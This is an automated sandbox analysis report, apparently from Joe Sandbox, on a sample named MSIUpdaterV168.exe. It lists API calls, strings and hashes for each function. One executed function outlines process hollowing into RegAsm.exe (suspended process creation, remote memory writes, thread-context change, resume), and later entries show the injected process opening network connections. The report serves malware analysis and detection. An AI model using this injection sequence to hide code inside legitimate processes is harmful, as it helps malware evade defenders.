Instruction ID: e18f2a36fd5acb6154b4614067112b6250bcabd102fc147c46e6d5a459c2d6c3
Opcode Fuzzy Hash: f837ec5534037d0146a73204fc8f8c42bc2c1b77034003fee8679e30fbf5892a
Instruction Fuzzy Hash: 6351ACB260821BAFEF349F649D81EBB7AA9EF14750F150128FD04E6291EB71CC50D7A0

Function 0012547A Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00125481
std::_Lockit::_Lockit.LIBCPMT ref: 0012548C
std::_Lockit::~_Lockit.LIBCPMT ref: 001254FA

Part of subcall function 001255DD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 001255F5

std::locale::_Setgloballocale.LIBCPMT ref: 001254A7
_Yarn.LIBCPMT ref: 001254BD

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: ce58e1285fb3888d303c07aebbd553580731caac7a6e75539f275dbf1c8f6667
Instruction ID: e2a6a0982217cb64daf9af3402ad5b814d733bd115699d3a73250eb19c7826b0
Opcode Fuzzy Hash: ce58e1285fb3888d303c07aebbd553580731caac7a6e75539f275dbf1c8f6667
Instruction Fuzzy Hash: C701DF75A00A709BDB05EF24F889A3D77B2FF91340B14000CE8025B391CFB4AE52CB85

Function 0012B6F2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0012B6A3,00000000,00000001,002E41BC,?,?,?,0012B846,00000004,InitializeCriticalSectionEx,00146EA0,InitializeCriticalSectionEx), ref: 0012B6FF
GetLastError.KERNEL32(?,0012B6A3,00000000,00000001,002E41BC,?,?,?,0012B846,00000004,InitializeCriticalSectionEx,00146EA0,InitializeCriticalSectionEx,00000000,?,0012B5FD), ref: 0012B709
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0012A513), ref: 0012B731

Strings

api-ms-, xrefs: 0012B716

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 91c934ebeb803544fe78cb84583c27e03616295c6abac4a8c65b9205a42c297e
Instruction ID: cea454a744550e3db18ed15cb1ed0a6ff5b99b8e2b2eac6cd13b7524d6d25090
Opcode Fuzzy Hash: 91c934ebeb803544fe78cb84583c27e03616295c6abac4a8c65b9205a42c297e
Instruction Fuzzy Hash: 9FE04F38284304BBEF211F60EC87F593B659F52B55F100030FA0DA94F1D76199A495C8

Function 001381B7 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(E49B113A,00000000,00000000,00000000), ref: 0013821A

Part of subcall function 0013A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00137CA8,?,00000000,-00000008), ref: 0013A463

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00138475
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001384BD
GetLastError.KERNEL32 ref: 00138560

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 37d1ee81710e763ec96173e462b5e6ff20ae14547039f22560744b4d584da20c
Instruction ID: 16bb3ab2ca581ad5319da536b97c46f3e937845966fac0a86284a69319545173
Opcode Fuzzy Hash: 37d1ee81710e763ec96173e462b5e6ff20ae14547039f22560744b4d584da20c
Instruction Fuzzy Hash: 26D158B5D04258AFCF15CFE8D880AADBBB5FF09314F18416AE856EB351DB30A946CB50

Function 0012A6C1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0012A788
___AdjustPointer.LIBCMT ref: 0012A7AB
___AdjustPointer.LIBCMT ref: 0012A847

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 859b9e9d58519d79d5ff45b6b87db4a9e6ffea277e8f0aeef3737ff65fa13deb
Instruction ID: 39fbb38862e5088817e59049f10aa0853b3565a29e1612f144096fa96f4bfed4
Opcode Fuzzy Hash: 859b9e9d58519d79d5ff45b6b87db4a9e6ffea277e8f0aeef3737ff65fa13deb
Instruction Fuzzy Hash: F351EE766012229FDB289F10F841BBAB7B4FF14300F544429E90687691E732ECB1CB96

Function 0013A7D3 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0013A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00137CA8,?,00000000,-00000008), ref: 0013A463

GetLastError.KERNEL32 ref: 0013A837
__dosmaperr.LIBCMT ref: 0013A83E
GetLastError.KERNEL32(?,?,?,?), ref: 0013A878
__dosmaperr.LIBCMT ref: 0013A87F

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: dadd5c439f92f5fa6a7fe5eddfbb6bf2f7befa7ffa7e010044c622b26559ab2c
Instruction ID: 60613597d2d945c6f85d13ef06792729708227a70158c0c86f023f2a7128bb20
Opcode Fuzzy Hash: dadd5c439f92f5fa6a7fe5eddfbb6bf2f7befa7ffa7e010044c622b26559ab2c
Instruction Fuzzy Hash: 86210131600205BFCB24AF65D88086BB7ADFF20325F50856CF89997210DB31EC52CB92

Function 00131056 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86823e68d7a8385de26231033066e857f04893554fcb4b8d4d0d1a77519f5a19
Instruction ID: a782a65b3ae554de4815b66dc07810589da8260eb21c3750c1b59a892faed9b9
Opcode Fuzzy Hash: 86823e68d7a8385de26231033066e857f04893554fcb4b8d4d0d1a77519f5a19
Instruction Fuzzy Hash: 6521CD31600215BFCB24AF75DC819ABB7AAFF21364F104638FA1897661D730EC90DBA0

Function 0013B769 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0013B771

Part of subcall function 0013A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00137CA8,?,00000000,-00000008), ref: 0013A463

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0013B7A9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0013B7C9

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: a69ea6a48ff528cfb52fe498333be1a124691c5b15ae8849638d86efc45c9136
Instruction ID: 70f615252b35fa30066f70c25780d71c29c425da7d51cf44482f2e532ce27b05
Opcode Fuzzy Hash: a69ea6a48ff528cfb52fe498333be1a124691c5b15ae8849638d86efc45c9136
Instruction Fuzzy Hash: 891100B29095197FE7152BB65CCECAF3A6DEEE6798F150024FA0291201FB30DE0082B1

Function 00142339 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,001410F4,00000000,00000001,00000000,00000000,?,001385B4,00000000,00000000,00000000), ref: 00142350
GetLastError.KERNEL32(?,001410F4,00000000,00000001,00000000,00000000,?,001385B4,00000000,00000000,00000000,00000000,00000000,?,00138B3B,00000000), ref: 0014235C

Part of subcall function 00142322: CloseHandle.KERNEL32(FFFFFFFE,0014236C,?,001410F4,00000000,00000001,00000000,00000000,?,001385B4,00000000,00000000,00000000,00000000,00000000), ref: 00142332

___initconout.LIBCMT ref: 0014236C

Part of subcall function 001422E4: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00142313,001410E1,00000000,?,001385B4,00000000,00000000,00000000,00000000), ref: 001422F7

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,001410F4,00000000,00000001,00000000,00000000,?,001385B4,00000000,00000000,00000000,00000000), ref: 00142381

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 87ed43f72e309f7f49f8c9f744b24167bc973259c925eec8696fd8f3c1fc945c
Instruction ID: af936e1a6ff1f645fd34d07c03a601233ced56966088742411a1c022714b7486
Opcode Fuzzy Hash: 87ed43f72e309f7f49f8c9f744b24167bc973259c925eec8696fd8f3c1fc945c
Instruction Fuzzy Hash: D9F01C3A500529BBCF225FD5EC08E893F66FB5A7A5F444450FA088A231CB7289A0DB90

Function 0012A3B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0012A3EF
__IsNonwritableInCurrentImage.LIBCMT ref: 0012A4A3

Strings

csm, xrefs: 0012A48D

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 77c5bcb5378b3f1b8006fbeb18da7d63f4a868c015d17056ee1c34ebc4fc6929
Instruction ID: a4cfb1e4ab44afdef4c63c931fcef863ccdbcffd93dee7741a7384be6975cf91
Opcode Fuzzy Hash: 77c5bcb5378b3f1b8006fbeb18da7d63f4a868c015d17056ee1c34ebc4fc6929
Instruction Fuzzy Hash: 4F41F930A00268DFCF04EF68E884A9E7BB5BF45324F588155E8195B352D7B1EE25CB92

Function 0012ACBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0012ACE2

Strings

RCC, xrefs: 0012ACFC
MOC, xrefs: 0012ACF4

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b6a5bd3da7e0e1b9a944ecab702c23f3b112044048db5c07a52dda5de6da75f8
Instruction ID: cbca0eee86466d38eb9c754822db35ec8f2ca4f4ebd9aceee0bbb85071c3d496
Opcode Fuzzy Hash: b6a5bd3da7e0e1b9a944ecab702c23f3b112044048db5c07a52dda5de6da75f8
Instruction Fuzzy Hash: 9641487290021DEFCF16DF94ED81AAEBBB5FF48311F584099FA0467221D3359960DB92

Function 001271DA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001279F9
___raise_securityfailure.LIBCMT ref: 00127AE1

Strings

X>., xrefs: 00127ADC

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: X>.
API String ID: 3761405300-16625832
Opcode ID: 1baf1b53a76985f53a5abb8d27e544d5dddd8c6e1fd582a14c107dac923b0b60
Instruction ID: 28b364de7f30e1b833f90957963441c8b909beada9f7e64f66a9e245ec81f6e9
Opcode Fuzzy Hash: 1baf1b53a76985f53a5abb8d27e544d5dddd8c6e1fd582a14c107dac923b0b60
Instruction Fuzzy Hash: C42107B5990384EBDB14CF18F8CE6147BB4BB08716F24506AE5098FBB1D7B49A84CF45

Function 00127AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00127AFF
___raise_securityfailure.LIBCMT ref: 00127BBC

Strings

X>., xrefs: 00127BB7

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: X>.
API String ID: 3761405300-16625832
Opcode ID: 680a5b80a0d71dba8729ea6bacf1ed764dfcd3280fa625411bccf001abd85d09
Instruction ID: d37fb53fb5b2d32c039cfafb7782cfb07c2963f1f1272fd97af2a3e255998c76
Opcode Fuzzy Hash: 680a5b80a0d71dba8729ea6bacf1ed764dfcd3280fa625411bccf001abd85d09
Instruction Fuzzy Hash: 0311D2B99903C4EBDB10DF19F8CD6547BB4BB08712B14505AE4088FBB1E7B09A81CF85

Function 00122420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00122425
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0012246A

Part of subcall function 00125578: _Yarn.LIBCPMT ref: 00125597
Part of subcall function 00125578: _Yarn.LIBCPMT ref: 001255BB

Strings

bad locale name, xrefs: 00122478

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 2fbb1d25b4bf71493987aa592204c6b7f0cb65545d9e2909d31f62a7c96330f5
Instruction ID: 18720e3d6893ff557c97c69fa3184923586cc2c29a1c44bd6253559d25e2ae7c
Opcode Fuzzy Hash: 2fbb1d25b4bf71493987aa592204c6b7f0cb65545d9e2909d31f62a7c96330f5
Instruction Fuzzy Hash: 3BF01771501B909ED370DF399844747BAE0AF29310F048A1EE4CAC7A52E3B5E548CBA6

Function 00122CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00122CFF
std::_Lockit::~_Lockit.LIBCPMT ref: 00122D1A

Strings

ios_base::badbit set, xrefs: 00122CF1

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: ios_base::badbit set
API String ID: 593203224-3882152299
Opcode ID: 72f9f115f694e5fb1d1e58219d4adfd3de856bb34171c6388deacabfe841a12c
Instruction ID: 98f62466dcecd131ed58dc576dc3494ae80161d99e41d6506e72485de271cb2a
Opcode Fuzzy Hash: 72f9f115f694e5fb1d1e58219d4adfd3de856bb34171c6388deacabfe841a12c
Instruction Fuzzy Hash: 8BE0EC71510225EFD724DF18F885BA5B3E4EB64312F30052EE0C6C7195EBB059D0CB85

Analysis Process: MSIUpdaterV168.exePID: 8096, Parent PID: 1044COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008E018D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,008E00FF,008E00EF), ref: 008E02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 008E030F
Wow64GetThreadContext.KERNEL32(000002A8,00000000), ref: 008E032D
ReadProcessMemory.KERNELBASE(000002AC,?,008E0143,00000004,00000000), ref: 008E0351
VirtualAllocEx.KERNELBASE(000002AC,?,?,00003000,00000040), ref: 008E037C
WriteProcessMemory.KERNELBASE(000002AC,00000000,?,?,00000000,?), ref: 008E03D4
WriteProcessMemory.KERNELBASE(000002AC,00400000,?,?,00000000,?,00000028), ref: 008E041F
WriteProcessMemory.KERNELBASE(000002AC,?,?,00000004,00000000), ref: 008E045D
Wow64SetThreadContext.KERNEL32(000002A8,008F0000), ref: 008E0499
ResumeThread.KERNELBASE(000002A8), ref: 008E04A8

Strings

WriteProcessMemory, xrefs: 008E02A0
GetThreadContext, xrefs: 008E0267
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 008E02FB
VirtualAlloc, xrefs: 008E0254
ResumeThread, xrefs: 008E02C9
GetP, xrefs: 008E020F
ReadProcessMemory, xrefs: 008E027A
ress, xrefs: 008E0217
CreateProcessA, xrefs: 008E0241
SetThreadContext, xrefs: 008E02B3
VirtualAllocEx, xrefs: 008E028D
aryA, xrefs: 008E01D3
TerminateProcess, xrefs: 008E038B
Load, xrefs: 008E01CB

Memory Dump Source

Source File: 0000000E.00000002.1981353679.00000000008E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_8e0000_MSIUpdaterV168.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: d9cecd25b657f5b3d9a62715b453b2ab76599e10513eb6791382dde887e25310
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: FAB1F67260028AAFDB60CF69CC80BDA77A5FF88714F158524EA0CEB341D774FA418B94

Analysis Process: RegAsm.exePID: 8188, Parent PID: 8004COMMON

Executed Functions

Function 0045DB00 Relevance: 7.7, APIs: 5, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCursorPos.USER32(?), ref: 0045DB13
GetCursorPos.USER32(?), ref: 0045DB19
Sleep.KERNELBASE(000003E9), ref: 0045DBC8
GetCursorPos.USER32(?), ref: 0045DBCE
Sleep.KERNELBASE(00000001), ref: 0045DC7A

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Cursor$Sleep
String ID:
API String ID: 1847515627-0
Opcode ID: 64e1b3b3cfd2bc4f7f18a9e387635337b0495f42438516b07fc99cf1f27a474a
Instruction ID: ab3f96cd0466869246e3b632190b9ed1b666d42f9e689fec286df2e29c35159e
Opcode Fuzzy Hash: 64e1b3b3cfd2bc4f7f18a9e387635337b0495f42438516b07fc99cf1f27a474a
Instruction Fuzzy Hash: E651BB35A04215CFCB25CF58C4D0EAAB7B2EF89705B2A809AD945AF352D735FD49CB80

Function 00409280 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,0054D15C,00000000,74D723A0,-00589880), ref: 004096A6
GetProcAddress.KERNEL32(00000000,?), ref: 004096B4
WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,0054D15C,00000000,74D723A0,-00589880), ref: 004096C9

Strings

Ws2_32.dll, xrefs: 0040969A

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProcSend
String ID: Ws2_32.dll
API String ID: 2819740048-3093949381
Opcode ID: db86688a72ee539e1465eebb719896dd27e80f2f1a20018145df215637b41859
Instruction ID: 188670ed5cfc709ed037a390f66f33add7af100e18449b0941b00ad524943a05
Opcode Fuzzy Hash: db86688a72ee539e1465eebb719896dd27e80f2f1a20018145df215637b41859
Instruction Fuzzy Hash: 7C02CE70D04298DEDF25CFA4C8907ADBBB0EF59304F24429EE4456B2C6D7781D86CB96

Function 004C7B00 Relevance: 18.3, APIs: 12, Instructions: 279
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(00000340,0000FFFF,00001006,?,00000008), ref: 004C7BA6
recv.WS2_32(?,00000004,00000002), ref: 004C7BC1
WSAGetLastError.WS2_32 ref: 004C7BC5
recv.WS2_32(00000000,0000000C,00000002,00000000), ref: 004C7C43
recv.WS2_32(00000000,0000000C,00000008), ref: 004C7C64
setsockopt.WS2_32(0000FFFF,00001006,?,00000008,?), ref: 004C7D00
recv.WS2_32(00000000,?,00000008), ref: 004C7D1B

Part of subcall function 004C8590: WSAStartup.WS2_32 ref: 004C85BA
Part of subcall function 004C8590: getaddrinfo.WS2_32(?,?,?,00589328), ref: 004C863C
Part of subcall function 004C8590: socket.WS2_32(?,?,?), ref: 004C865D
Part of subcall function 004C8590: connect.WS2_32(00000000,00559BFC,?), ref: 004C8671
Part of subcall function 004C8590: closesocket.WS2_32(00000000), ref: 004C867D
Part of subcall function 004C8590: freeaddrinfo.WS2_32(?,?,?,?,00589328,?,?), ref: 004C868A
